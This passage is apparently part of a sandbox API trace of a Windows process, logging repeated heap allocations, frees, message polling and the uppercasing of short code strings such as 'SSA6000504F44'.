(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0200.408] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0200.408] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0200.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.409] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.409] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0200.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0200.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.410] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.411] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.411] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0200.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.412] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.413] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.413] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.413] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.413] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.413] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.413] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.414] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.414] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.414] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.414] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.414] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.415] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.415] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.415] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.416] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.416] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.416] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.416] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.417] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.417] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.417] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.417] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0200.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.418] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.418] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.418] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.419] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0200.419] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 